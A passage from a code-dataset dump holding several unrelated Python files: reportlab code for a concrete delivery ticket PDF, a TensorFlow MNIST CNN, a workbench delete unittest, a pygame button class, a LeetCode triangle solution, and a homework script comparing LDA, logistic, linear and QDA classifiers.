Cement Content:', '%.0f kg/m^3' % (r.total_cement())),\r\n ('Cement Type:', ', '.join(r.cement_types_as_list())),\r\n ('Max W/C Ratio:', '%.2f' % (r.wc_ratio())),\r\n ('Exposure Class:', ', '.join(r.exp_classes_as_list())),\r\n ('Cl Content Class:', r.get_cl_content_class_display()),\r\n ))\r\n c2.width = 0.96*w/2\r\n c2.ls = 1.2\r\n t3.place_cursor(c2,2,2)\r\n c2.listwrite((\r\n ('Time On Site:','-...'),\r\n ('Time Off Loaded:','-...'),\r\n ('Amount Conveyered:','-...'),\r\n ('Water Added (Supplier)','-...'),\r\n ('','-...'),\r\n ('Extra Water Added',''),\r\n ('at Customers Instruction:','-...'),\r\n ('','-...'),\r\n ('Estimated Slump:','-...'),\r\n ))\r\n \r\n t4 = table(p, \r\n left=t3.left,\r\n top=t3.bottom,\r\n row_heights=[22],\r\n col_widths=[w],\r\n bord_t=False,\r\n )\r\n t4.place_cursor(c1,1,1); c1.write('Customer')\r\n\r\n t5 = table(p, \r\n left=t4.left,\r\n top=t4.bottom,\r\n row_heights=[85,35],\r\n col_widths=[w/2],\r\n bord_t=False,\r\n )\r\n t5.place_cursor(c1,1,1)\r\n c1.listwrite([\r\n ['-Caution: Prolongled skin contact with'],\r\n ['wet concrete can result in cement burns'],\r\n ['-Where contact occurs wash thoroughly!'],\r\n ['-Material safety data sheet available upon request'],\r\n ])\r\n t5.place_cursor(c1,2,1,align='cl')\r\n c1.write('Conforms to EN-206-1: ');\r\n c1.write('Yes '); c1.checkbox(); c1.write(' No '); c1.checkbox()\r\n\r\n t6 = table(p, \r\n left=t5.right,\r\n top=t5.top,\r\n row_heights=[sum(t5.row_h)],\r\n col_widths=[w/2],\r\n bord_t=False,\r\n bord_l=False\r\n )\r\n t6.place_cursor(c1,1,1,align='tc')\r\n c1.width = 0.96*w/2\r\n c1.ls = 0.65\r\n c1.listwrite([\r\n ['Received in good order and condition'],\r\n ['Customer/Representative signature:'],\r\n ['...'],\r\n [''],\r\n ['...'],\r\n ], align='c')\r\n \r\n # draw logos on the page\r\n nsaiHeight = 25*mm\r\n nsaiWidth = nsaiHeight*167/237\r\n drawLogo(p,w-nsaiWidth,h-nsaiHeight-25,'nsai_logo.jpg',nsaiHeight,nsaiWidth)\r\n\r\n icfWidth = nsaiHeight*142/146\r\n drawLogo(p,w-nsaiWidth-icfWidth-15,h-nsaiHeight-25,'icf_logo.jpg',nsaiHeight,icfWidth)\r\n\r\n ceHeight = 10*mm\r\n ceWidth = ceHeight*500/350\r\n drawLogo(p,w-nsaiWidth-icfWidth-ceWidth-30,h-nsaiHeight-25,'ce_logo.jpg',ceHeight,ceWidth)\r\n\r\n # finish page, save and return filepath\r\n p.showPage()\r\n p.save()\r\n return filepath\r\n \r\ndef drawLogo(p,x,y,logo,height,width):\r\n logoHeight = height\r\n logoWidth = width\r\n img = ImageReader(settings.MEDIA_ROOT + '\\\\' + logo)\r\n p.drawImage(img, x, y, height=logoHeight, width=logoWidth)\r\n\r\nclass table:\r\n \"\"\"For drawing tables with borders and finding the coordinates to write inside\"\"\"\r\n \"\"\"(c) Joseph Thompson 2017\"\"\"\r\n\r\n def __init__(self, canvas, left, top, row_heights, col_widths, draw=True, bord_t=True, bord_b=True, bord_l=True, bord_r=True):\r\n self.c = canvas\r\n self.row_h = row_heights\r\n self.col_w = col_widths\r\n self.nrows = len(row_heights)\r\n self.ncols = len(col_widths)\r\n self.left = left\r\n self.top = top\r\n self.bottom = self.top-sum(self.row_h)\r\n self.right = self.left+sum(self.col_w)\r\n if draw == True:\r\n self.draw(bord_t, bord_b, bord_l, bord_r)\r\n\r\n def place_cursor(self, cur, row, col, font='Helvetica', gap=4, align='tl'):\r\n s = cur.size\r\n v_align = align[0];\r\n h_align = align[1];\r\n l = self.left + sum(self.col_w[0:col-1])\r\n r = self.left + sum(self.col_w[0:col])\r\n t = self.top - sum(self.row_h[0:row-1])\r\n b = self.top - sum(self.row_h[0:row])\r\n if h_align == 'c':\r\n cur.x = (l + r)/2\r\n elif h_align == 
'r':\r\n cur.x = r - gap\r\n else:\r\n cur.x = l + gap\r\n if v_align == 'c':\r\n cur.y = (t + b - s)/2\r\n elif v_align == 'b':\r\n cur.y = b + gap\r\n else:\r\n cur.y = t - s - gap \r\n cur.reset()\r\n\r\n def draw(self, t=True, b=True, l=True, r=True):\r\n for i in range(t==False,self.nrows+(b==True)):\r\n self.c.line(self.left, self.top-sum(self.row_h[0:i]),\r\n self.right, self.top-sum(self.row_h[0:i]))\r\n for i in range(l==False,self.ncols+(r==True)):\r\n self.c.line(self.left+sum(self.col_w[0:i]), self.top,\r\n self.left+sum(self.col_w[0:i]), self.bottom)\r\n \r\nclass cursor:\r\n \"\"\"Simple cursor for writing text on canvas\"\"\"\r\n \"\"\"(c) Joseph Thompson 2017\"\"\"\r\n \r\n def __init__(self, canvas, start_x, start_y, font='Helvetica', size=12, ls=0.5, width=80):\r\n self.c = canvas\r\n self.x = start_x\r\n self.y = start_y\r\n self.font = font\r\n self.size = size\r\n self.ls = ls\r\n self.reset()\r\n self.width = width\r\n\r\n def reset(self):\r\n self.x_home = self.x\r\n self.y_home = self.y\r\n\r\n def wrap_write(self, text_string, max_length, align='l'):\r\n from textwrap import wrap\r\n lines = wrap(text_string, max_length, break_long_words=True)\r\n line_list = [[line] for line in lines]\r\n self.listwrite(line_list, align=align)\r\n \r\n def write(self,text_string,align='l'):\r\n def start_x(x,w,align):\r\n if align == 'r':\r\n return x-w\r\n elif align == 'c':\r\n return x-w/2\r\n else:\r\n return x \r\n self.c.setFont(self.font, self.size)\r\n s = self.size\r\n if text_string == '-...':\r\n w = self.width\r\n x = start_x(self.x,w,align)\r\n self.c.setDash(1,2)\r\n\r\n self.c.line(x, self.y-s/4.0,\r\n self.x_home+w, self.y-s/4.0)\r\n self.c.setDash(1)\r\n elif text_string == '...':\r\n w = self.width\r\n x = start_x(self.x,w,align)\r\n self.c.setDash(1,2)\r\n\r\n self.c.line(x, self.y-s/4.0,\r\n x+w, self.y-s/4.0)\r\n self.c.setDash(1) \r\n else:\r\n w = stringWidth(text_string, self.font, self.size)\r\n x = start_x(self.x,w,align)\r\n self.c.drawString(x, self.y, str(text_string))\r\n self.x = x + w \r\n\r\n def listwrite(self,string_list_list,align='l',key_font='Helvetica'):\r\n val_font = self.font\r\n for string_list in string_list_list:\r\n if len(string_list) == 0:\r\n self.newline() \r\n elif len(string_list) == 1:\r\n self.write(string_list[0], align=align)\r\n self.newline()\r\n else:\r\n self.font = key_font\r\n self.write(string_list[0], align=align)\r\n self.write(' ')\r\n self.font = val_font\r\n val_x = self.x\r\n for i in range(1,len(string_list)):\r\n self.x = val_x\r\n self.write(string_list[i], align=align)\r\n self.newline()\r\n\r\n def newline(self):\r\n self.x = self.x_home\r\n self.y += -(1+self.ls)*self.size\r\n\r\n def checkbox(self):\r\n s = self.size\r\n self.c.rect(self.x, self.y-s/4.0, s*1.25, s*1.25)\r\n self.x += s*1.25\r\n","sub_path":"batches/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":11233,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"23460553","text":"import tensorflow as tf\nfrom tensorflow_core.examples.tutorials.mnist import input_data\n\nimport os\n\nos.environ['KMP_DUPLICATE_LIB_OK']='True'\n\ntf.reset_default_graph()\n\n# 1. data loading\nmnist = input_data.read_data_sets('../data/mnist/', one_hot=True)\n\n# 2. 
placeholder\nX = tf.placeholder(shape=[None, 784], dtype=tf.float32)\nY = tf.placeholder(shape=[None, 10], dtype=tf.float32)\n\n# convolution\n# conv layer 1\n# convolution image 처리 형태로 변환\nx_img = tf.reshape(X, [-1, 28, 28, 1])\nW1 = tf.Variable(tf.random_normal([3, 3, 1, 32], stddev=0.01))\nL1 = tf.nn.conv2d(x_img, W1, strides=[1, 1, 1, 1], padding='SAME')\n\nL1 = tf.nn.relu(L1)\nL1 = tf.nn.max_pool(L1, ksize=[1, 2, 2, 1], strides=[1, 2, 2, 1], padding='SAME')\nprint('L1 shape: {}'.format(L1.shape))\n\n# conv layer 2\nW2 = tf.Variable(tf.random_normal([3, 3, 32, 64], stddev=0.01))\nL2 = tf.nn.conv2d(L1, W2, strides=[1, 1, 1, 1], padding='SAME')\nL2 = tf.nn.relu(L2)\nL2 = tf.nn.max_pool(L2, ksize=[1, 2, 2, 1], strides=[1, 2, 2, 1], padding='SAME')\nprint('L2 shape: {}'.format(L2.shape))\n\n# FC에 넣기 위해서 flatten 처리\nL2 = tf.reshape(L2, [-1, 7*7*64])\nprint('L2 shape: {}'.format(L2.shape))\n\n# FC (기존 neural network)\nkeep_prob = tf.placeholder(dtype=tf.float32)\n\n# Weight & bias\nW3 = tf.get_variable('weight3', shape=[7*7*64, 256], initializer=tf.contrib.layers.xavier_initializer())\nb1 = tf.Variable(tf.random_normal([256]), name='bias1')\n_layer1 = tf.nn.relu(tf.matmul(L2, W3) + b1)\nlayer1 = tf.nn.dropout(_layer1, keep_prob=keep_prob)\n\nW4 = tf.get_variable('weight4', shape=[256, 256], initializer=tf.contrib.layers.xavier_initializer())\nb2 = tf.Variable(tf.random_normal([256]), name='bias2')\n_layer2 = tf.nn.relu(tf.matmul(layer1, W4) + b2)\nlayer2 = tf.nn.dropout(_layer2, keep_prob=keep_prob)\n\nW5 = tf.get_variable('weight5', shape=[256, 10], initializer=tf.contrib.layers.xavier_initializer())\nb3 = tf.Variable(tf.random_normal([10]), name='bias3')\n\n# Hypothesis\nH = tf.matmul(layer2, W5) + b3\n\n# cost function\ncost = tf.reduce_mean(tf.nn.softmax_cross_entropy_with_logits_v2(logits=H, labels=Y))\n\n# train\ntrain = tf.train.AdamOptimizer(learning_rate=0.001).minimize(cost)\n\n# session\nsess = tf.Session()\nsess.run(tf.global_variables_initializer())\n\n# 학습\nnum_of_epoch = 5\nbatch_size = 100\n\nfor step in range(num_of_epoch):\n num_of_iter = int(mnist.train.num_examples / batch_size)\n avg_cost = 0\n for i in range(num_of_iter):\n batch_x, batch_y = mnist.train.next_batch(batch_size)\n _, cost_val = sess.run([train, cost], feed_dict={X: batch_x, Y: batch_y, keep_prob: 0.7})\n avg_cost += cost_val / num_of_iter\n print('cost: {}'.format(avg_cost))\n\n# accuracy\npredict = tf.argmax(H, 1)\ncorrect = tf.equal(predict, tf.argmax(Y, 1))\naccuracy = tf.reduce_mean(tf.cast(correct, dtype=tf.float32))\n\nprint('정확도: {}'.format(sess.run(accuracy, feed_dict={X: mnist.test.images, Y: mnist.test.labels, keep_prob: 1})))\n","sub_path":"Project10_Python/com.ai03_code/04_cnn/06_mnist_cnn.py","file_name":"06_mnist_cnn.py","file_ext":"py","file_size_in_byte":2931,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"5581354","text":"import os\nimport tempfile\nimport unittest\nimport subprocess\n\n\nclass DeleteTest(unittest.TestCase):\n\n def setUp(self):\n self.current_dir = os.path.dirname(os.path.abspath(__file__))\n create_config_file_path = os.path.join(self.current_dir, 'assets', 'deletetest', 'create.yml')\n self.create_cmd = [\"./workbench\", \"--config\", create_config_file_path]\n\n self.temp_dir = tempfile.gettempdir()\n self.nid_file = os.path.join(self.temp_dir, 'workbenchdeletetesttnids.txt')\n\n nids = list()\n create_output = subprocess.check_output(self.create_cmd)\n create_output = create_output.decode().strip()\n 
create_lines = create_output.splitlines()\n with open(self.nid_file, \"a\") as fh:\n fh.write(\"node_id\\n\")\n for line in create_lines:\n if 'created at' in line:\n nid = line.rsplit('/', 1)[-1]\n nid = nid.strip('.')\n nids.append(nid)\n fh.write(nid + \"\\n\")\n\n def test_delete_check(self):\n delete_config_file_path = os.path.join(self.current_dir, 'assets', 'deletetest', 'delete.yml')\n delete_cmd = [\"./workbench\", \"--config\", delete_config_file_path]\n delete_output = subprocess.check_output(delete_cmd)\n delete_output = delete_output.decode().strip()\n delete_lines = delete_output.splitlines()\n\n self.assertEqual(len(delete_lines), 5)\n\n def tearDown(self):\n os.remove(self.nid_file)\n\n\nif __name__ == '__main__':\n unittest.main()\n","sub_path":"tests/DeleteTest.py","file_name":"DeleteTest.py","file_ext":"py","file_size_in_byte":1555,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"513717795","text":"import pygame\n\n# Assumption: EVENT_LOAD_DECK is a custom event id defined elsewhere in the original\n# project; it is declared here so the snippet runs standalone.\nEVENT_LOAD_DECK = pygame.USEREVENT + 1\n\nclass Button:\n\tdef __init__(self, x, y, w, h, label):\n\t\tself.x = x\n\t\tself.y = y\n\t\tself.w = w\n\t\tself.h = h\n\t\tself.label = label\n\t\tself.mouseOver = False\n\t\tself.buttonFont = pygame.font.Font(\"CyberpunkIsNotDead_ANR.ttf\", 12)\n\t\t\n\tdef draw(self, screen):\n\t\tif self.mouseOver:\n\t\t\tpygame.draw.rect(screen, 0x8080FF, (self.x, self.y, self.w, self.h))\n\t\telse:\n\t\t\tpygame.draw.rect(screen, 0x808080, (self.x, self.y, self.w, self.h))\n\t\ttextSurface = self.buttonFont.render(self.label, True, (255, 255, 255))\n\t\tscreen.blit(textSurface, ((self.w/2) - (textSurface.get_width()/2) + self.x, (self.h/2) - (textSurface.get_height()/2) + self.y))\n\t\t\n\tdef update(self, event):\n\t\tif event.type == pygame.MOUSEBUTTONUP:\n\t\t\tif event.pos[0] >= self.x and event.pos[0] <= self.x + self.w and event.pos[1] >= self.y and event.pos[1] <= self.y + self.h:\n\t\t\t\tif self.label == \"Quit\":\n\t\t\t\t\tpygame.event.post(pygame.event.Event(pygame.QUIT))\n\t\t\t\telif self.label == \"Load Deck\":\n\t\t\t\t\tpygame.event.post(pygame.event.Event(EVENT_LOAD_DECK, {}))\n\t\telif event.type == pygame.MOUSEMOTION:\n\t\t\tif event.pos[0] >= self.x and event.pos[0] <= self.x + self.w and event.pos[1] >= self.y and event.pos[1] <= self.y + self.h:\n\t\t\t\tself.mouseOver = True\n\t\t\telse:\n\t\t\t\tself.mouseOver = False","sub_path":"Button.py","file_name":"Button.py","file_ext":"py","file_size_in_byte":1265,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"62198486","text":"#\n# @lc app=leetcode id=120 lang=python3\n#\n# [120] Triangle\n#\n# https://leetcode.com/problems/triangle/description/\n#\n# algorithms\n# Medium (42.22%)\n# Likes: 1653\n# Dislikes: 199\n# Total Accepted: 227.8K\n# Total Submissions: 534.1K\n# Testcase Example: '[[2],[3,4],[6,5,7],[4,1,8,3]]'\n#\n# Given a triangle, find the minimum path sum from top to bottom. 
Each step you\n# may move to adjacent numbers on the row below.\n# \n# For example, given the following triangle\n# \n# \n# [\n# ⁠ [2],\n# ⁠ [3,4],\n# ⁠ [6,5,7],\n# ⁠ [4,1,8,3]\n# ]\n# \n# \n# The minimum path sum from top to bottom is 11 (i.e., 2 + 3 + 5 + 1 = 11).\n# \n# Note:\n# \n# Bonus point if you are able to do this using only O(n) extra space, where n\n# is the total number of rows in the triangle.\n# \n#\n\n# @lc code=start\nclass Solution:\n def minimumTotal(self, triangle: List[List[int]]) -> int:\n res = triangle[-1]\n h = len(triangle)\n for i in range(h-2,-1,-1):\n for j in range(0,i+1):\n res[j] = min(res[j],res[j+1]) +triangle[i][j]\n return res[0]\n \n# @lc code=end\n\n","sub_path":"120.triangle.py","file_name":"120.triangle.py","file_ext":"py","file_size_in_byte":1098,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"469114925","text":"import numpy as np\nimport tensorflow as tf\nimport pandas as pd\nimport matplotlib.pyplot as plt\nimport matplotlib.mlab as mlab\nfrom matplotlib.patches import Ellipse\n\nFILES = ['classificationA.train', 'classificationA.test',\n 'classificationB.train', 'classificationB.test',\n 'classificationC.train', 'classificationC.test']\n\nCONFIG = {'A': {'DS': 'A', 'TRAIN': FILES[0], 'TEST': FILES[1]},\n 'B': {'DS': 'B', 'TRAIN': FILES[2], 'TEST': FILES[3]},\n 'C': {'DS': 'C', 'TRAIN': FILES[4], 'TEST': FILES[5]}}\n\nCONFIG = CONFIG['C'] # Set to config A\nSTOPPING = 0.001 # stopping criterion for IRLS\n\n\ntest = tf.placeholder(dtype=tf.float32, shape=[None, 3,])\ntrain = tf.placeholder(dtype=tf.float32, shape=[None, 3,])\npi_mle = tf.Variable(initial_value=0, dtype=tf.float32)\nmu_0_mle = tf.Variable(initial_value=[0,0], dtype=tf.float32)\nmu_1_mle = tf.Variable(initial_value=[0,0], dtype=tf.float32)\nsigma_mle = tf.Variable(initial_value=[[0,0], [0,0]], dtype=tf.float32)\nsigma_mle_1 = tf.Variable(initial_value=[[0,0], [0,0]], dtype=tf.float32)\nsigma_mle_2 = tf.Variable(initial_value=[[0,0], [0,0]], dtype=tf.float32)\n\n# Compute pi MLE for MoG\npi_mle = pi_mle.assign(tf.reduce_mean(train, axis=0)[2])\n\n# Compute mu MLE for MoG\ngroup_1 = tf.squeeze(tf.gather(train[:,0:2], indices=tf.where(condition=tf.equal(train[:, 2],0))))\nmu_0_mle = mu_0_mle.assign(tf.reduce_mean(group_1, axis=0))\n\ngroup_2 = tf.squeeze(tf.gather(train[:,0:2], indices=tf.where(condition=tf.equal(train[:, 2],1))))\nmu_1_mle = mu_1_mle.assign(tf.reduce_mean(group_2, axis=0))\n\n# Compute Sigma MLE for MoG\nsize_1 = tf.cast(tf.shape(group_1)[0], tf.float32)\nsigma_mle_1 = sigma_mle_1.assign(tf.matmul(tf.transpose(group_1), group_1)/size_1)\nsigma_mle_1 -= [[mu_0_mle[0]**2, mu_0_mle[0]*mu_0_mle[1]],\n [mu_0_mle[0]*mu_0_mle[1], mu_0_mle[1]**2]]\nsize_2 = tf.cast(tf.shape(group_2)[0], tf.float32)\nsigma_mle_2 = sigma_mle_2.assign(tf.matmul(tf.transpose(group_2), group_2)/size_2)\nsigma_mle_2 -= [[mu_1_mle[0]**2, mu_1_mle[0]*mu_1_mle[1]],\n [mu_1_mle[0]*mu_1_mle[1], mu_1_mle[1]**2]]\nsigma_mle = sigma_mle.assign((size_1/(size_1+size_2))*sigma_mle_1 + (size_1/(size_1+size_2))*sigma_mle_2)\n\n# Logistic Regression OPs\ntrain_labels = tf.placeholder(dtype=tf.float32, shape=[None, 1,])\nlogistic_weights = tf.Variable(initial_value=tf.random_uniform(shape=[3, 1]), dtype=tf.float32)\n\nmu = tf.sigmoid(tf.matmul(train, logistic_weights))\nD = tf.diag(tf.squeeze(tf.add(1.0, -mu)))\nlogistic_update = tf.matrix_inverse(tf.matmul(tf.matmul(tf.transpose(train), D), train))\nlogistic_update = tf.matmul(tf.matmul(logistic_update, 
tf.transpose(train)), tf.add(mu, -train_labels))\nlogistic_train_op = logistic_weights.assign(tf.add(logistic_weights,-logistic_update))\n\ninit_op = tf.global_variables_initializer()\n\n# Linear Regression OPs\nlinear_weights = tf.Variable(initial_value=tf.random_uniform(shape=[3, 1]), dtype=tf.float32)\nlinear_train_op = linear_weights.assign(\n tf.matmul(\n tf.matmul(tf.matrix_inverse(tf.matmul(tf.transpose(train), train)), tf.transpose(train)),\n train_labels)\n )\n\n# Do computations in Tensorflow!\nwith tf.Session() as sess:\n train_data = pd.read_table('hwk2data/' + CONFIG['TRAIN'], header=None)\n test_data = pd.read_table('hwk2data/' + CONFIG['TEST'], header=None)\n sess.run(init_op)\n\n # Q1 TF comps\n pi_mle, mu_0_mle, mu_1_mle, \\\n sigma_mle, sigma_mle_1, sigma_mle_2 = sess.run([pi_mle, mu_0_mle, mu_1_mle, sigma_mle, sigma_mle_1, sigma_mle_2],\n feed_dict={train: train_data, test: test_data})\n\n # Q2 TF comps\n train_data[3] = [1] * train_data.shape[0]\n\n logistic_weights = sess.run(logistic_train_op, feed_dict={train: train_data[[0, 1, 3]],\n train_labels: train_data[[2]]})\n previous_weights = np.array([0, 0, 0])\n\n step = 1\n while np.linalg.norm(logistic_weights.flatten()-previous_weights) > STOPPING: # Stopping criterion\n previous_weights = logistic_weights.flatten()\n logistic_weights = sess.run(logistic_train_op, feed_dict={train: train_data[[0, 1, 3]],\n train_labels: train_data[[2]]})\n #print('Updating weights for separating plane, step {} ...'.format(step))\n step += 1\n #print('Norm of change in weights ...')\n #print(np.linalg.norm(logistic_weights.flatten()-previous_weights))\n\n # Q3 TF comps\n linear_weights = sess.run(linear_train_op, feed_dict={train: train_data[[0, 1, 3]],\n train_labels: train_data[[2]]})\n\n\n#########################################################\n#################### Question 1 C #######################\n#########################################################\n\n# Implementing MLE for Mixture of Gaussians with shared Covariance to each Dataset.\n\n# Compute seperating plane\nm_0 = -np.dot(np.transpose(mu_0_mle), np.linalg.inv(sigma_mle))\nm_1 = -np.dot(np.transpose(mu_1_mle), np.linalg.inv(sigma_mle))\nb_0 = -0.5*np.dot(m_0, mu_0_mle) + np.log(1-pi_mle)\nb_1 = -0.5*np.dot(m_1, mu_1_mle) + np.log(pi_mle)\nprint(\"Weights for LDA seperating line: \",(m_0-m_1)[0],(m_0-m_1)[1], b_0-b_1)\n\n\ndef line(x):\n return -(b_0-b_1 + (m_0[0]-m_1[0])*x)/(m_0[1]-m_1[1])\n\n# Plot data points\nplt.figure()\nplt.scatter(x=train_data[train_data[2] == 0][0], y=train_data[train_data[2] == 0][1], color='red')\nplt.scatter(x=train_data[train_data[2] == 1][0], y=train_data[train_data[2] == 1][1], color='blue')\n\n# Overlay with contours of Normal Dist.\nx = np.linspace(-8, 8)\ny = np.linspace(-8, 8)\nX, Y = np.meshgrid(x, y)\nZ1 = mlab.bivariate_normal(X, Y, sigmax=sigma_mle[0,0], sigmay=sigma_mle[1,1],\n mux=mu_0_mle[0], muy=mu_0_mle[1], sigmaxy=sigma_mle[1,0])\nZ2 = mlab.bivariate_normal(X, Y, sigmax=sigma_mle[0,0], sigmay=sigma_mle[1,1],\n mux=mu_1_mle[0], muy=mu_1_mle[1], sigmaxy=sigma_mle[1,0])\nplt.contour(X, Y, Z1, colors='pink')\nplt.contour(X, Y, Z2, colors='turquoise')\n\nx = np.linspace(-2, 2)\nplt.plot(x, line(x), 'k-', linewidth=1)\nplt.xlabel('Dim 1')\nplt.ylabel('Dim 2')\nplt.title('Dataset {}: Separating Plane - LDA'.format(CONFIG['DS']))\nplt.savefig('../img_{}_MoG'.format(CONFIG['DS']))\nplt.show()\n\n# Compute error rate\ndef get_error_rate(w_1,w_2, b, X_0, X_1, Y):\n tp = np.logical_and(np.add(w_1*X_0, w_2*X_1) + b > 0, Y == 1)\n tn 
= np.logical_and(np.add(w_1 * X_0, w_2 * X_1) + b < 0, Y == 0)\n error_rate = 1 - (np.sum(tp)+np.sum(tn))/X_0.shape[0]\n return(error_rate)\n\ntrain_rate = get_error_rate(w_1=(m_0 - m_1)[0], w_2=(m_0 - m_1)[1], b=(b_0-b_1),\n X_0=train_data[[0]], X_1=train_data[[1]], Y=train_data[[2]])\nprint('MoG Training rate: {}'.format(train_rate))\n\ntest_rate = get_error_rate(w_1=(m_0 - m_1)[0], w_2=(m_0 - m_1)[1], b=(b_0-b_1),\n X_0=test_data[[0]], X_1=test_data[[1]], Y=test_data[[2]])\nprint('MoG Testing rate: {}'.format(test_rate))\n\n#######################################################\n#################### Question 2 #######################\n#######################################################\n\n# Implementing Logistic Regression to each Dataset.\nprint(\"Weights for Logistic Regression: \", logistic_weights.flatten().tolist())\n\n\ndef line(x):\n return -(logistic_weights[2] + (logistic_weights[0])*x)/(logistic_weights[1])\n\n# Plot data points and seperating plane\nplt.figure()\nplt.scatter(x=train_data[train_data[2] == 0][0], y=train_data[train_data[2] == 0][1], color='red')\nplt.scatter(x=train_data[train_data[2] == 1][0], y=train_data[train_data[2] == 1][1], color='blue')\n\nx = np.linspace(-3, 3)\nplt.plot(x, line(x), 'k-', linewidth=1)\nplt.xlabel('Dim 1')\nplt.ylabel('Dim 2')\nplt.title('Dataset {}: Separating Plane - Logistic'.format(CONFIG['DS']))\n\nplt.savefig('../img_{}_Log'.format(CONFIG['DS']))\nplt.show()\n\ntrain_rate = get_error_rate(w_1=logistic_weights[0], w_2=logistic_weights[1], b=logistic_weights[2],\n X_0=train_data[[0]], X_1=train_data[[1]], Y=train_data[[2]])\nprint('Logistic Training rate: {}'.format(train_rate))\n\ntest_rate = get_error_rate(w_1=logistic_weights[0], w_2=logistic_weights[1], b=logistic_weights[2],\n X_0=test_data[[0]], X_1=test_data[[1]], Y=test_data[[2]])\nprint('Logistic Testing rate: {}'.format(test_rate))\n\n#######################################################\n#################### Question 3 #######################\n#######################################################\n\n# See Linear Regression weights for Dataset.\nprint(\"Weights for Linear Regression: \", linear_weights.flatten().tolist())\n\n\ndef line(x):\n return (0.5 - linear_weights[2] - (linear_weights[0])*x)/(linear_weights[1])\n\n# Plot data points and seperating plane\nplt.figure()\nplt.scatter(x=train_data[train_data[2] == 0][0], y=train_data[train_data[2] == 0][1], color='red')\nplt.scatter(x=train_data[train_data[2] == 1][0], y=train_data[train_data[2] == 1][1], color='blue')\n\nx = np.linspace(-3, 3)\nplt.plot(x, line(x), 'k-', linewidth=1)\nplt.xlabel('Dim 1')\nplt.ylabel('Dim 2')\nplt.title('Dataset {}: Separating Plane - Linear'.format(CONFIG['DS']))\n\nplt.savefig('../img_{}_Lin'.format(CONFIG['DS']))\nplt.show()\n\n# Compute error rate\ndef get_error_rate(w_1,w_2, b, X_0, X_1, Y):\n tp = np.logical_and(np.add(w_1*X_0, w_2*X_1) + b > 0.5, Y == 1)\n tn = np.logical_and(np.add(w_1 * X_0, w_2 * X_1) + b < 0.5, Y == 0)\n error_rate = 1 - ((np.sum(tp)+np.sum(tn))/X_0.shape[0])\n return(error_rate)\n\ntrain_rate = get_error_rate(w_1=linear_weights[0], w_2=linear_weights[1], b=linear_weights[2],\n X_0=train_data[[0]], X_1=train_data[[1]], Y=train_data[[2]])\nprint('LR Training rate: {}'.format(train_rate))\n\ntest_rate = get_error_rate(w_1=linear_weights[0], w_2=linear_weights[1], b=linear_weights[2],\n X_0=test_data[[0]], X_1=test_data[[1]], Y=test_data[[2]])\nprint('LR Testing rate: 
{}'.format(test_rate))\n\n#######################################################\n#################### Question 5 #######################\n#######################################################\n\n# Compute separating plane\ns_mle_inv_1 = np.linalg.inv(sigma_mle_1)\ns_mle_inv_2 = np.linalg.inv(sigma_mle_2)\nb = 0.5*np.log(np.linalg.det(sigma_mle_2)/np.linalg.det(sigma_mle_1)) + np.log(pi_mle/(1-pi_mle)) \\n - 0.5*np.dot(np.dot(np.transpose(mu_0_mle), s_mle_inv_1),mu_0_mle) \\n + 0.5*np.dot(np.dot(np.transpose(mu_1_mle), s_mle_inv_2),mu_1_mle)\n\nm_x = np.dot(s_mle_inv_1, mu_0_mle)[0] - np.dot(s_mle_inv_2, mu_1_mle)[0]\nm_y = np.dot(s_mle_inv_1, mu_0_mle)[1] - np.dot(s_mle_inv_2, mu_1_mle)[1]\n\nm_x2 = -0.5*s_mle_inv_1[0,0] + 0.5*s_mle_inv_2[0,0]\nm_xy = -s_mle_inv_1[0,1] + s_mle_inv_2[0,1]\nm_y2 = -0.5*s_mle_inv_1[1,1] +0.5*s_mle_inv_2[1,1]\n\nprint(\"Weights for QDA separating line: \", m_x, m_y, m_x2, m_xy, m_y2, b)\n\n# Plot data points\nplt.figure()\nplt.scatter(x=train_data[train_data[2] == 0][0], y=train_data[train_data[2] == 0][1], color='red')\nplt.scatter(x=train_data[train_data[2] == 1][0], y=train_data[train_data[2] == 1][1], color='blue')\n\n# Overlay with contours of Normal Dist.\nx = np.linspace(-8, 8)\ny = np.linspace(-8, 8)\nx, y = np.meshgrid(x, y)\nZ1 = mlab.bivariate_normal(X, Y, sigmax=sigma_mle_1[0,0], sigmay=sigma_mle_1[1,1],\n mux=mu_0_mle[0], muy=mu_0_mle[1], sigmaxy=sigma_mle_1[1,0])\nZ2 = mlab.bivariate_normal(X, Y, sigmax=sigma_mle_2[0,0], sigmay=sigma_mle_2[1,1],\n mux=mu_1_mle[0], muy=mu_1_mle[1], sigmaxy=sigma_mle_2[1,0])\nplt.contour(X, Y, Z1, colors='pink')\nplt.contour(X, Y, Z2, colors='turquoise')\n\n\n# Compute error rate\ndef get_error_rate(X_0, X_1, Y):\n tp = np.logical_and(\n np.add(np.add(np.add(np.add(np.add(X_0*m_x, X_1*m_y), m_x2*X_0**2),\n m_xy*np.multiply(X_0, X_1)), m_y2*X_1**2), b) < 0, Y == 1)\n tn = np.logical_and(\n np.add(np.add(np.add(np.add(np.add(X_0*m_x, X_1*m_y), m_x2*X_0**2),\n m_xy*np.multiply(X_0,X_1)), m_y2*X_1**2), b) > 0, Y == 0)\n error_rate = 1 - ((np.sum(tp)+np.sum(tn))/X_0.shape[0])\n return(error_rate)\n\ntrain_rate = get_error_rate(X_0=train_data[[0]], X_1=train_data[[1]], Y=train_data[[2]])\nprint('QDA Training rate: {}'.format(train_rate))\n\ntest_rate = get_error_rate(X_0=test_data[[0]], X_1=test_data[[1]], Y=test_data[[2]])\nprint('QDA Testing rate: {}'.format(test_rate))\n\nplt.contour(x, y, (x*m_x + y*m_y + m_x2*x**2 + m_xy*x*y + m_y2*y**2 + b), [0], colors='k')\nplt.xlabel('Dim 1')\nplt.ylabel('Dim 2')\nplt.title('Dataset {}: Separating Conic - QDA'.format(CONFIG['DS']))\nplt.savefig('../img_{}_MoG_dm'.format(CONFIG['DS']))\nplt.show()\n\nprint('The learned parameters are:')\nprint('pi: {0} \\n mean 1: {1} \\n mean 2: {2} \\n Sigma 1: {3} \\n Sigma 2: {4}'\n .format(pi_mle, mu_0_mle, mu_1_mle, sigma_mle_1, 